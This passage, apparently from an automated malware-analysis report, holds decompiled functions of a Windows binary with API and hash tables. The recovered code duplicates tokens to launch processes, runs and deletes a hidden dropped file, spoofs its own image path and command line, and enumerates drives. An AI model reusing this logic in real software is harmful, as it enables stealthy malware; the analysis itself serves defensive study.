                                                                                        				intOrPtr _t81;
                                                                                        				wchar_t** _t82;
                                                                                        				void* _t85;
                                                                                        
                                                                                        				if( *0x40f5e6 == 0) {
                                                                                        					if( *0x40f5ea == 0) {
                                                                                        						_t51 = 0;
                                                                                        					} else {
                                                                                        						_t51 =  *0x40f5ea; // 0x0
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t51 =  *0x40f5e6; // 0x0
                                                                                        				}
                                                                                        				_v12 = _t51;
                                                                                        				_t53 = GetModuleFileNameW(0,  &_v556, 0x104);
                                                                                        				if(_t53 == 0) {
                                                                                        					L28:
                                                                                        					return _t53;
                                                                                        				} else {
                                                                                        					_v32 = E00406BF9();
                                                                                        					_v8 = 0;
                                                                                        					_v28 = 0;
                                                                                        					_t81 = _a4;
                                                                                        					_t53 = E004072E0(_t81, 1,  &_v16, 0xffffffff,  &_v20,  &_v24,  &_v28, 0x64);
                                                                                        					if(_t53 != 0) {
                                                                                        						goto L28;
                                                                                        					}
                                                                                        					_t53 = RtlAllocateHeap( *0x40f5d6, 8, _v20 * 4);
                                                                                        					_v36 = _t53;
                                                                                        					if(_v36 != 0) {
                                                                                        						_t82 = _v16;
                                                                                        						do {
                                                                                        							if(_t82[1] == 0) {
                                                                                        								L15:
                                                                                        								if(E00407153(_v12, _t81,  *_t82) == 0) {
                                                                                        									goto L21;
                                                                                        								}
                                                                                        								_t19 = _t81 + 4; // 0x408cfc
                                                                                        								_t66 = wcslen(_t19);
                                                                                        								_t67 = wcslen( *_t82);
                                                                                        								_t85 = _t85 + 8;
                                                                                        								_t80 = RtlAllocateHeap( *0x40f5d6, 8, 0xc + (_t66 + _t67) * 2);
                                                                                        								if(_t80 == 0) {
                                                                                        									goto L21;
                                                                                        								}
                                                                                        								 *_t80 = 0x4e0055;
                                                                                        								_t80[1] = 0x5c0043;
                                                                                        								_t23 = _t81 + 4; // 0x408cfc
                                                                                        								wcscat(_t80, _t23);
                                                                                        								E00401A3A(_t80);
                                                                                        								wcscat(_t80,  *_t82);
                                                                                        								_t85 = _t85 + 0x10;
                                                                                        								E00406C06(_v12,  &_v556, _t80, _v8, _v36, 0);
                                                                                        								_v8 = _v8 + 1;
                                                                                        								if(_v8 != _v32) {
                                                                                        									goto L21;
                                                                                        								}
                                                                                        								_t77 = WaitForMultipleObjects(_v8, _v36, 1, 0xffffffff);
                                                                                        								_push(_t82);
                                                                                        								do {
                                                                                        									asm("lodsd");
                                                                                        									_t77 = NtClose(_t77);
                                                                                        									_v8 = _v8 - 1;
                                                                                        								} while (_v8 != 0);
                                                                                        								_pop(_t82);
                                                                                        								goto L21;
                                                                                        							}
                                                                                        							if(_t82[1] == 0x80000000 && E00407236( *_t82) == 0) {
                                                                                        								goto L15;
                                                                                        							}
                                                                                        							L21:
                                                                                        							_t82 =  &(_t82[3]);
                                                                                        							_v20 = _v20 - 1;
                                                                                        						} while (_v20 != 0);
                                                                                        						_t53 = RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        						L23:
                                                                                        						if(_v8 == 0) {
                                                                                        							L26:
                                                                                        							if(_v36 == 0) {
                                                                                        								goto L28;
                                                                                        							}
                                                                                        							return RtlFreeHeap( *0x40f5d6, 0, _v36);
                                                                                        						}
                                                                                        						_t63 = WaitForMultipleObjects(_v8, _v36, 1, 0xffffffff);
                                                                                        						do {
                                                                                        							asm("lodsd");
                                                                                        							_t63 = NtClose(_t63);
                                                                                        							_v8 = _v8 - 1;
                                                                                        						} while (_v8 != 0);
                                                                                        						goto L26;
                                                                                        					}
                                                                                        					goto L23;
                                                                                        				}
                                                                                        			}

                                                                                        0x00407b3c
                                                                                        0x00407b4c
                                                                                        0x00407b55
                                                                                        0x00407b4e
                                                                                        0x00407b4e
                                                                                        0x00407b4e
                                                                                        0x00407b3e
                                                                                        0x00407b3e
                                                                                        0x00407b3e
                                                                                        0x00407b57
                                                                                        0x00407b68
                                                                                        0x00407b70
                                                                                        0x00407d29
                                                                                        0x00407d29
                                                                                        0x00407b76
                                                                                        0x00407b7b
                                                                                        0x00407b7e
                                                                                        0x00407b85
                                                                                        0x00407b8c
                                                                                        0x00407ba6
                                                                                        0x00407bad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407bc6
                                                                                        0x00407bcc
                                                                                        0x00407bd3
                                                                                        0x00407bda
                                                                                        0x00407bdd
                                                                                        0x00407be1
                                                                                        0x00407bfe
                                                                                        0x00407c0b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407c11
                                                                                        0x00407c15
                                                                                        0x00407c22
                                                                                        0x00407c28
                                                                                        0x00407c43
                                                                                        0x00407c47
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407c49
                                                                                        0x00407c4f
                                                                                        0x00407c56
                                                                                        0x00407c5b
                                                                                        0x00407c65
                                                                                        0x00407c6d
                                                                                        0x00407c73
                                                                                        0x00407c89
                                                                                        0x00407c8e
                                                                                        0x00407c97
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407ca3
                                                                                        0x00407ca9
                                                                                        0x00407cad
                                                                                        0x00407cad
                                                                                        0x00407caf
                                                                                        0x00407cb5
                                                                                        0x00407cb8
                                                                                        0x00407cbe
                                                                                        0x00000000
                                                                                        0x00407cbe
                                                                                        0x00407bea
                                                                                        0x00000000
                                                                                        0x00407bf7
                                                                                        0x00407cbf
                                                                                        0x00407cbf
                                                                                        0x00407cc2
                                                                                        0x00407cc5
                                                                                        0x00407cda
                                                                                        0x00407ce0
                                                                                        0x00407ce4
                                                                                        0x00407d0a
                                                                                        0x00407d0e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407d1b
                                                                                        0x00407cf0
                                                                                        0x00407cf9
                                                                                        0x00407cf9
                                                                                        0x00407cfb
                                                                                        0x00407d01
                                                                                        0x00407d04
                                                                                        0x00000000
                                                                                        0x00407cf9
                                                                                        0x00000000
                                                                                        0x00407bd5

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,00000000), ref: 00407B68
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00408CF8), ref: 00407BC6
                                                                                        • wcslen.NTDLL ref: 00407C15
                                                                                        • wcslen.NTDLL ref: 00407C22
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407C3D
                                                                                        • wcscat.NTDLL ref: 00407C5B
                                                                                        • wcscat.NTDLL ref: 00407C6D
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000001,000000FF,00408CF8,?,00000000,00000000,00000000,00000000), ref: 00407CA3
                                                                                        • NtClose.NTDLL(00000000), ref: 00407CAF
                                                                                        • RtlFreeHeap.NTDLL(00000000,?,00408CF8), ref: 00407CDA
                                                                                          • Part of subcall function 00407236: _wcsicmp.NTDLL ref: 0040727D
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000001,000000FF,?,?,?,?,00000000), ref: 00407CF0
                                                                                        • NtClose.NTDLL(00000000), ref: 00407CFB
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407D1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateCloseFreeMultipleObjectsWaitwcscatwcslen$FileModuleName_wcsicmp
                                                                                        • String ID: C
                                                                                        • API String ID: 2558984808-1037565863
                                                                                        • Opcode ID: db0690ae8750f9371b35c319286616e1a87cd1469a40b6f761cd6199e2282b1c
                                                                                        • Instruction ID: cef0aa228eca02f175d772fba0474a859ba3ed73c1a33fa541fa2c875ba2e559
                                                                                        • Opcode Fuzzy Hash: db0690ae8750f9371b35c319286616e1a87cd1469a40b6f761cd6199e2282b1c
                                                                                        • Instruction Fuzzy Hash: 9A515971908208FFEF209F90DD48BAEB7B9FB04305F10453AF511B22A0D779A959DB5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 34%
                                                                                        			E004027BC() {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				char _v16;
                                                                                        				void* _v20;
                                                                                        				int _v24;
                                                                                        				WCHAR* _v28;
                                                                                        				WCHAR* _v32;
                                                                                        				WCHAR* _v36;
                                                                                        				WCHAR* _v40;
                                                                                        				WCHAR* _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				struct _SERVICE_STATUS _v52;
                                                                                        				struct _STARTUPINFOW _v124;
                                                                                        				struct _PROCESS_INFORMATION _v140;
                                                                                        				char* _v144;
                                                                                        				WCHAR* _v148;
                                                                                        				WCHAR* _v152;
                                                                                        				WCHAR* _v156;
                                                                                        				WCHAR* _v160;
                                                                                        				char _v164;
                                                                                        				char _v167;
                                                                                        				char _v168;
                                                                                        				intOrPtr _v172;
                                                                                        				char _v176;
                                                                                        				char _v208;
                                                                                        				intOrPtr* _t87;
                                                                                        
                                                                                        				_v24 = RegisterServiceCtrlHandlerW( *0x40f95c, E004027B5);
                                                                                        				if(_v24 != 0) {
                                                                                        					_v52 = 0x110;
                                                                                        					_v48 = 4;
                                                                                        					_v44 = 0;
                                                                                        					_v40 = 0;
                                                                                        					_v36 = 0;
                                                                                        					_v32 = 0;
                                                                                        					_v28 = 0;
                                                                                        					if(SetServiceStatus(_v24,  &_v52) != 0) {
                                                                                        						_push( &_v8);
                                                                                        						_push(0x2000000);
                                                                                        						_push(0xffffffff);
                                                                                        						if( *0x40f6e4() == 0) {
                                                                                        							_v176 = 0xc;
                                                                                        							_v172 = 3;
                                                                                        							_v168 = 0;
                                                                                        							_v167 = 0;
                                                                                        							_v164 = 0x18;
                                                                                        							_v160 = 0;
                                                                                        							_v156 = 0;
                                                                                        							_v152 = 0;
                                                                                        							_v148 = 0;
                                                                                        							_v144 =  &_v176;
                                                                                        							_push( &_v12);
                                                                                        							_push(1);
                                                                                        							_push(0);
                                                                                        							_push( &_v164);
                                                                                        							_push(0x2000000);
                                                                                        							_push(_v8);
                                                                                        							if( *0x40f6b4() == 0) {
                                                                                        								_v16 = E00401C93();
                                                                                        								_push(4);
                                                                                        								_push( &_v16);
                                                                                        								_push(0xc);
                                                                                        								_push(_v12);
                                                                                        								if( *0x40f6d4() == 0) {
                                                                                        									E00401AE1(_v12);
                                                                                        									_push(1);
                                                                                        									_push(_v12);
                                                                                        									_push( &_v20);
                                                                                        									if( *0x40f938() != 0) {
                                                                                        										memset( &_v140, 0, 0x10);
                                                                                        										memset( &_v124, 0, 0x48);
                                                                                        										_v124.cb = 0x48;
                                                                                        										_t87 =  &_v208;
                                                                                        										 *_t87 = 0x690057;
                                                                                        										 *((intOrPtr*)(_t87 + 4)) = 0x53006e;
                                                                                        										 *((intOrPtr*)(_t87 + 8)) = 0x610074;
                                                                                        										 *((intOrPtr*)(_t87 + 0xc)) = 0x5c0030;
                                                                                        										 *((intOrPtr*)(_t87 + 0x10)) = 0x650044;
                                                                                        										 *((intOrPtr*)(_t87 + 0x14)) = 0x610066;
                                                                                        										 *((intOrPtr*)(_t87 + 0x18)) = 0x6c0075;
                                                                                        										 *((intOrPtr*)(_t87 + 0x1c)) = 0x74;
                                                                                        										_v124.lpDesktop = _t87;
                                                                                        										if(CreateProcessAsUserW(_v12, 0,  *0x40f5e2, 0, 0, 0, 0x80430, _v20, 0,  &_v124,  &_v140) != 0) {
                                                                                        											NtClose(_v140);
                                                                                        											NtClose(_v140.hThread);
                                                                                        										}
                                                                                        										 *0x40f93c(_v20);
                                                                                        									}
                                                                                        								}
                                                                                        								NtClose(_v12);
                                                                                        							}
                                                                                        							NtClose(_v8);
                                                                                        						}
                                                                                        						_v52 = 0x110;
                                                                                        						_v48 = 1;
                                                                                        						_v44 = 0;
                                                                                        						_v40 = 0;
                                                                                        						_v36 = 0;
                                                                                        						_v32 = 0;
                                                                                        						_v28 = 0;
                                                                                        						SetServiceStatus(_v24,  &_v52);
                                                                                        					}
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}


APIs
• RegisterServiceCtrlHandlerW.ADVAPI32(Function_000027B5), ref: 004027D0
• SetServiceStatus.ADVAPI32(00000000,00000110), ref: 0040281B
• NtOpenProcessToken.NTDLL(000000FF,02000000,?), ref: 00402834
• NtDuplicateToken.NTDLL(?,02000000,00000018,00000000,00000001,?), ref: 004028B9
• NtSetInformationToken.NTDLL(?,0000000C,?,00000004), ref: 004028DA
• NtClose.NTDLL(?), ref: 004029C7
  • Part of subcall function 00401AE1: NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
  • Part of subcall function 00401AE1: NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
  • Part of subcall function 00401AE1: NtClose.NTDLL(005C003F), ref: 00401B4D
• memset.NTDLL ref: 00402912
• memset.NTDLL ref: 00402923
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00080430,?,00000000,00000048,?), ref: 00402999
• NtClose.NTDLL(?), ref: 004029A9
• NtClose.NTDLL(?), ref: 004029B5
• NtClose.NTDLL(?), ref: 004029D0
• SetServiceStatus.ADVAPI32(00000000,00000110), ref: 00402A0E
Strings
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Close$Token$Service$DuplicateInformationProcessStatusmemset$CreateCtrlHandlerOpenRegisterThreadUser
• String ID: H
• API String ID: 1514161951-2852464175
• Opcode ID: 972512c50c8dde4b418ff70452bfcfc6d45830bb5e09b680e711a062b3575c0b
• Instruction ID: 6d24dedfd07dbbf4ac9121751a7b96aa0af6ce2b37ab588081401d70967f2461
• Opcode Fuzzy Hash: 972512c50c8dde4b418ff70452bfcfc6d45830bb5e09b680e711a062b3575c0b
• Instruction Fuzzy Hash: 6151BAB1900218EFEB219F90DD49BDEBBB8FB04704F1441B9E504BA1A1D7B64A88DF65
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 91%
E0040456A() {
    void* _v8;
    void* _v12;
    struct _STARTUPINFOW _v84;
    struct _PROCESS_INFORMATION _v100;
    short _v620;
    short _v1140;
    char _t36;

    _v12 = 0;
    // Indirect call through the pointer at 0x40f8b8; the APIs list below resolves it to
    // SHGetSpecialFolderPathW. CSIDL 0x23 is CSIDL_COMMON_APPDATA (the all-users ProgramData folder).
     *0x40f8b8(0,  &_v620, 0x23, 0);
    // Temporary file name inside that folder.
    GetTempFileNameW( &_v620, 0, 0,  &_v1140);
    // E00401D08 returns a heap buffer (it calls RtlAllocateHeap, see the subcall entry below) built from data at 0x40e8d6.
    _v8 = E00401D08(0x40e8d6);
    if(_v8 != 0) {
        _v12 = RtlAllocateHeap( *0x40f5d6, 0, 0x12e8);
        if(_v12 != 0) {
            // E0040A135 processes _v8 into _v12; its return value is passed to E00401C9B together with the temp path.
            _t36 = E00401C9B( &_v1140, _v12, E0040A135(_v8, _v12));
            if(_t36 != 0) {
                memset( &_v100, 0, 0x10);
                memset( &_v84, 0, 0x48);
                // cb = 0x48 is sizeof(STARTUPINFOEXW) on 32-bit, matching the EXTENDED_STARTUPINFO_PRESENT flag below.
                _v84.cb = 0x48;
                // 0x8080000 = CREATE_NO_WINDOW (0x08000000) | EXTENDED_STARTUPINFO_PRESENT (0x00080000).
                // The temp file is executed, waited on, and then deleted.
                if(CreateProcessW(0,  &_v1140, 0, 0, 1, 0x8080000, 0, 0,  &_v84,  &_v100) != 0) {
                    WaitForSingleObject(_v100.hProcess, 0xffffffff);
                    NtClose(_v100); // decompiler rendering: the first member of PROCESS_INFORMATION is hProcess
                    NtClose(_v100.hThread);
                }
                _t36 = DeleteFileW( &_v1140);
            }
        }
    }
    if(_v8 != 0) {
        _t36 = RtlFreeHeap( *0x40f5d6, 0, _v8);
    }
    if(_v12 == 0) {
        return _t36;
    } else {
        return RtlFreeHeap( *0x40f5d6, 0, _v12);
    }
}


APIs
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000023,00000000), ref: 00404587
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040459F
  • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
• RtlAllocateHeap.NTDLL(00000000,000012E8,0040E8D6), ref: 004045CA
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404690
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 004046A7
Strings
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Heap$AllocateFree$FileFolderNamePathSpecialTemp
• String ID: H
• API String ID: 133574123-2852464175
• Opcode ID: a4064c55c635eb432e4438e95acb91c8d0baf7c06494d896e2fcdfc13b83f250
• Instruction ID: 91642b39a8523c4b0a1516c9930b3f7f497f1802c9500f2bea9157717e4d2dfe
• Opcode Fuzzy Hash: a4064c55c635eb432e4438e95acb91c8d0baf7c06494d896e2fcdfc13b83f250
• Instruction Fuzzy Hash: 1E3118B1944208FBEB209FA0DD0AFAD7B79BB04705F100475F204BA4E0D7BA5A599B1D
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040625C(long _a4, intOrPtr _a8, wchar_t* _a12, wchar_t* _a16) {
    long _v8;
    void* _v12;
    long _v16;
    void* _v20;
    void* _v24;
    intOrPtr _t42;
    int _t44;
    int _t45;
    int _t51;
    int _t55;
    intOrPtr _t65;

    _v8 = 0;
    // Proceeds only when the caller's (_a4, _a8) pair equals the values stored at 0x40f5f2 and 0x40f5f6.
    _t42 =  *0x40f5f2; // 0xa6e
    _t65 =  *0x40f5f6; // 0x0
    if(_t65 != _a8 || _t42 != _a4) {
        L21:
        // _v8 is 1 on a content match, 0 otherwise, or a Win32 last-error code on the failure paths below.
        return _v8;
    } else {
        _t44 = wcslen(_a12);
        _t45 = wcslen(_a16);
        _v20 = 0;
        _v24 = 0;
        // Heap flag 8 is HEAP_ZERO_MEMORY; the size covers both UTF-16 strings plus a separator and terminator.
        _v20 = RtlAllocateHeap( *0x40f5d6, 8, 4 + (_t44 + _t45) * 2);
        if(_v20 != 0) {
            // Builds the path as _a16 (directory) followed by _a12 (file name); E00401A3A is called in between, presumably to append the separator.
            wcscpy(_v20, _a16);
            E00401A3A(_v20);
            wcscat(_v20, _a12);
            // 0x80 = FILE_ATTRIBUTE_NORMAL, clearing read-only/hidden attributes before the open.
            _t51 = SetFileAttributesW(_v20, 0x80);
            __eflags = _t51;
            if(_t51 != 0) {
                // GENERIC_READ (0x80000000), no sharing, OPEN_EXISTING (3), FILE_ATTRIBUTE_NORMAL (0x80).
                _v12 = CreateFileW(_v20, 0x80000000, 0, 0, 3, 0x80, 0);
                __eflags = _v12 - 0xffffffff;
                if(_v12 != 0xffffffff) {
                    _v24 = RtlAllocateHeap( *0x40f5d6, 0, _a4);
                    __eflags = _v24;
                    if(_v24 != 0) {
                        // Reads up to _a4 bytes, runs E00401000 over them (a 32-bit checksum or hash, judging by the
                        // comparison below) and sets _v8 = 1 only if the result equals the constant stored at 0x40f5ee.
                        _t55 = ReadFile(_v12, _v24, _a4,  &_v16, 0);
                        __eflags = _t55;
                        if(_t55 != 0) {
                            __eflags = _v16;
                            if(_v16 != 0) {
                                __eflags = E00401000(_v24, _v16, 0xffffffff) -  *0x40f5ee; // 0x1ba45e81
                                if(__eflags == 0) {
                                    _v8 = 1;
                                }
                            }
                        } else {
                            // *[fs:0x34] is the TEB LastErrorValue field, i.e. an inlined GetLastError().
                            _v8 =  *[fs:0x34];
                        }
                    }
                } else {
                    _v8 =  *[fs:0x34];
                }
            } else {
                _v8 =  *[fs:0x34];
            }
        }
        if(_v12 != 0xffffffff) {
            NtClose(_v12);
        }
        if(_v20 != 0) {
            RtlFreeHeap( *0x40f5d6, 0, _v20);
        }
        if(_v24 != 0) {
            RtlFreeHeap( *0x40f5d6, 0, _v24);
        }
        goto L21;
    }
}

                                                                                        0x004063a1
                                                                                        0x004063a7
                                                                                        0x004063a9
                                                                                        0x004063a9
                                                                                        0x004063a7
                                                                                        0x00406383
                                                                                        0x00406389
                                                                                        0x00406389
                                                                                        0x00406381
                                                                                        0x00406343
                                                                                        0x00406349
                                                                                        0x00406349
                                                                                        0x00406311
                                                                                        0x00406317
                                                                                        0x00406317
                                                                                        0x0040630f
                                                                                        0x004063b4
                                                                                        0x004063b9
                                                                                        0x004063b9
                                                                                        0x004063c3
                                                                                        0x004063d0
                                                                                        0x004063d0
                                                                                        0x004063da
                                                                                        0x004063e7
                                                                                        0x004063e7
                                                                                        0x00000000
                                                                                        0x004063da

APIs
• wcslen.NTDLL ref: 0040628E
• wcslen.NTDLL ref: 0040629C
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004062C5
• wcscpy.NTDLL ref: 004062DF
• wcscat.NTDLL ref: 004062F6
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00406307
• NtClose.NTDLL(000000FF), ref: 004063B9
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 004063D0
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 004063E7
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Heap$Freewcslen$AllocateAttributesCloseFilewcscatwcscpy
• String ID:
• API String ID: 3518810966-0
• Opcode ID: 226d2c4afde3b8cec54bcca8d3aa33ed170b619abfefe8aae8ad66cb1f1846a0
• Instruction ID: 2eaa4e9fd8f092476644c0bf5c432b4a8346afcc2a07f9544f0d098c890c2e43
• Opcode Fuzzy Hash: 226d2c4afde3b8cec54bcca8d3aa33ed170b619abfefe8aae8ad66cb1f1846a0
• Instruction Fuzzy Hash: B8414830900209EFDB219F90DE49BAE7B75FB04311F104535F912B26F0C7756A68DB99
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 67%
E00402367() {
	long _v8;
	void* _t12;
	void* _t29;
	intOrPtr _t30;
	void* _t33;
	wchar_t* _t36;
	intOrPtr _t37;

	/* Three 0x1000-byte buffers in the current process (handle -1): MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_READWRITE (4). */
	_v8 = 0x1000;
	_t12 = NtAllocateVirtualMemory(0xffffffff, 0x40f958, 0,  &_v8, 0x3000, 4);
	if( *0x40f958 != 0) {
		_t12 = NtAllocateVirtualMemory(0xffffffff, 0x40f954, 0,  &_v8, 0x3000, 4);
		if( *0x40f954 != 0) {
			_t12 = NtAllocateVirtualMemory(0xffffffff, 0x40f950, 0,  &_v8, 0x3000, 4);
			if( *0x40f950 != 0) {
				E00401A95(_t12,  *0x40f950);
				E00401A3A( *0x40f950);
				_t12 = E00401D08(0x40cf2b); /* subcall allocates a heap buffer (RtlAllocateHeap, see APIs) and returns a wide string */
				_t29 = _t12;
				if(_t29 != 0) {
					wcscpy( *0x40f958, _t29);
					wcscat( *0x40f950, _t29);
					_t36 =  *0x40f950; // 0x0
					_t33 =  *0x40f954; // 0x0
					asm("stosw");
					memcpy(_t33, _t36, wcslen(_t36) << 1); /* copy the wide string from the 0x40f950 buffer into the 0x40f954 buffer */
					asm("stosw");
					RtlFreeHeap( *0x40f5d6, 0, _t29);
					_t30 =  *[fs:0x30]; /* PEB of the current process (x86 TEB->ProcessEnvironmentBlock) */
					 *0x40f6f0( *((intOrPtr*)(_t30 + 0x1c))); /* RtlEnterCriticalSection(PEB->FastPebLock), called through a resolved pointer */
					_t37 =  *((intOrPtr*)(_t30 + 0x10)); /* PEB->ProcessParameters (RTL_USER_PROCESS_PARAMETERS) */
					RtlInitUnicodeString(_t37 + 0x38,  *0x40f950); /* overwrites ProcessParameters->ImagePathName */
					RtlInitUnicodeString(_t37 + 0x40,  *0x40f954); /* overwrites ProcessParameters->CommandLine */
					 *0x40f6f4( *((intOrPtr*)(_t30 + 0x1c))); /* RtlLeaveCriticalSection(PEB->FastPebLock) */
					return  *0x40f704(0, E00402322, _t30); /* LdrEnumerateLoadedModules with callback E00402322 and the PEB as context */
				}
			}
		}
	}
	return _t12;
}

Instruction address range: 0x00402372 - 0x004024c0

APIs
• NtAllocateVirtualMemory.NTDLL(000000FF,0040F958,00000000,00001000,00003000,00000004), ref: 0040238D
• NtAllocateVirtualMemory.NTDLL(000000FF,0040F954,00000000,00001000,00003000,00000004), ref: 004023B4
• NtAllocateVirtualMemory.NTDLL(000000FF,0040F950,00000000,00001000,00003000,00000004), ref: 004023DB
  • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
  • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
• wcscpy.NTDLL ref: 0040241F
• wcscat.NTDLL ref: 0040242F
• wcslen.NTDLL ref: 0040244B
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402468
• RtlEnterCriticalSection.NTDLL(?), ref: 00402478
• RtlInitUnicodeString.NTDLL(?), ref: 0040248B
• RtlInitUnicodeString.NTDLL(?), ref: 0040249B
• RtlLeaveCriticalSection.NTDLL(?), ref: 004024A4
• LdrEnumerateLoadedModules.NTDLL(00000000,00402322,00000030), ref: 004024B2
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: Allocate$MemoryVirtual$CriticalHeapInitSectionStringUnicodewcslen$EnterEnumerateFreeLeaveLoadedModuleswcscatwcscpy
• String ID:
• API String ID: 2163445147-0
• Opcode ID: 1d62d6b59a3412c9bac590a29e8f3883147ab6c5f25ced12b31406c9b8b6eaeb
• Instruction ID: 3b7a80a09a9bfcfe26515e31e10af39c546ca5dec5a795d16e9a90de9f9f921e
• Opcode Fuzzy Hash: 1d62d6b59a3412c9bac590a29e8f3883147ab6c5f25ced12b31406c9b8b6eaeb
• Instruction Fuzzy Hash: 2A3190B1141206BBD721AB94EE49F5A3B2CFB04B15F200235FA10B29F0C7B9691DCB2C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E00407D8B() {
	intOrPtr _v8;                  /* high dword of _v12 */
	union _ULARGE_INTEGER _v12;    /* lpTotalNumberOfBytes from GetDiskFreeSpaceExW */
	intOrPtr _v16;                 /* high dword of _v20 */
	union _ULARGE_INTEGER _v20;    /* lpTotalNumberOfFreeBytes from GetDiskFreeSpaceExW */
	void* _v24;
	unsigned int _v28;
	void* _v32;
	char _v44;
	intOrPtr* _t38;
	int _t42;
	signed int _t52;
	long _t54;
	unsigned int _t55;
	void* _t57;
	void* _t59;
	WCHAR* _t60;
	void* _t61;

	_v24 = 0;
	_t54 = GetLogicalDriveStringsW(0, 0); /* first call: required buffer length in WCHARs */
	if(_t54 != 0) {
		_v32 = RtlAllocateHeap( *0x40f5d6, 8, _t54 * 2); /* HEAP_ZERO_MEMORY (8), size in bytes */
		if(_v32 != 0) {
			_t55 = GetLogicalDriveStringsW(_t54, _v32); /* fills the "X:\<NUL>" multi-string of drive roots */
			if(_t55 != 0) {
				_t38 =  &_v44;
				 *_t38 = 0x750025;                   /* builds the format string L"%u/%u" on the stack */
				 *((intOrPtr*)(_t38 + 4)) = 0x25002f;
				 *((intOrPtr*)(_t38 + 8)) = 0x75;
				_v24 = RtlAllocateHeap( *0x40f5d6, 8, _t55 * 4 * 8); /* output buffer for the drive summary string */
				if(_v24 != 0) {
					_v28 = _t55 >> 2; /* number of drive entries: each "X:\<NUL>" root is 4 WCHARs */
					_t57 = 0;
					_t60 = _v32;
					_t59 = _v24;
					do {
						_t42 = GetDriveTypeW(_t60);
						if(_t42 == 3 || _t42 == 2 || _t42 == 4) { /* DRIVE_FIXED, DRIVE_REMOVABLE, DRIVE_REMOTE */
